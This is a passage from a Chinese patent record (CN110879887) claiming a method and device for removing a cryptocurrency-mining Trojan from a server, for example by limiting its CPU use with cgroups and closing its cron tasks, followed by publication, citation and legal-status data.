closing a vulnerability port in the server to limit the port vulnerability of the server from being exposed to the outside;
and/or, adding a firewall to limit the port vulnerability of the server from being exposed to the outside.
4. The method according to claim 1, wherein the closing of the timed task in the mining Trojan program and the emptying of the mining Trojan program comprises:
closing the crond timed task of the mining Trojan program;
and modifying the mining Trojan program into an empty file, and locking the empty file.
5. The method for repairing a mining Trojan program according to claim 1, wherein after the checking and killing of the mining Trojan process that is still running after the Trojan program has been emptied, the method further comprises:
disabling the mining Trojan program's automatic start at boot;
processing the environment configuration file;
using a virus-killing tool to check and kill the residual mining Trojan program;
and restoring the command environment in the server to complete the repair of the mining Trojan program.
6. The method of any one of claims 1 to 5, wherein said limiting the CPU usage of the server's mining Trojan process to recover the normal service applications of the server comprises:
limiting the CPU usage of the mining Trojan process of the server by using cgroup technology so as to recover the normal service applications of the server.
7. The method of claim 6, wherein the using of cgroup technology to limit the CPU usage of the server's mining Trojan process to recover the normal service applications of the server comprises:
creating a cgroup restriction group;
and limiting the CPU usage of the cgroup restriction group to recover the normal service applications of the server.
8. A mining Trojan program repair device, comprising:
a communication cutting-off module, used for cutting off the communication between the server attacked by the mining Trojan program and the outside;
a limiting module, used for limiting the CPU usage of the mining Trojan process of the server so as to recover the normal service applications of the server;
a task closing module, used for closing the timed task of the mining Trojan program;
a program emptying module, used for emptying the mining Trojan program;
and a process searching and killing module, used for checking and killing the mining Trojan process that is still running after the Trojan program has been emptied.
9. A mining trojan program repair device, comprising:
a memory and a processor;
wherein the memory is used for storing a computer program;
the processor is configured to execute the computer program to implement the method for repairing a mining Trojan horse according to any one of claims 1 to 7.
10. A computer-readable storage medium storing a computer program, wherein the computer program, when executed by a processor, implements the method of mining Trojan horse program repair of any one of claims 1 to 7.

Priority Applications (1)

Application Number Publication Priority Date Filing Date Title
CN201911121661.9A CN110879887B (en) 2019-11-15 2019-11-15 Method, device, equipment and medium for repairing mining trojan program

Publications (2)

Publication Number Publication Date
CN110879887A (en) 2020-03-13
CN110879887B (en) 2022-03-04

Family

ID=69729199

Family Applications (1)

Application Number Status Publication Priority Date Filing Date Title
CN201911121661.9A Active CN110879887B (en) 2019-11-15 2019-11-15 Method, device, equipment and medium for repairing mining trojan program

Country Status (1)

Country Link
CN (1) CN110879887B (en)

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN112052053A (en) * 2020-10-10 2020-12-08 国科晋云技术有限公司 Method and system for cleaning mining program in high-performance computing cluster
CN114697086A (en) * 2022-03-17 2022-07-01 浪潮云信息技术股份公司 Mining Trojan detection method based on depth canonical correlation analysis


Also Published As

Publication number Publication date
CN110879887B (en) 2022-03-04


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant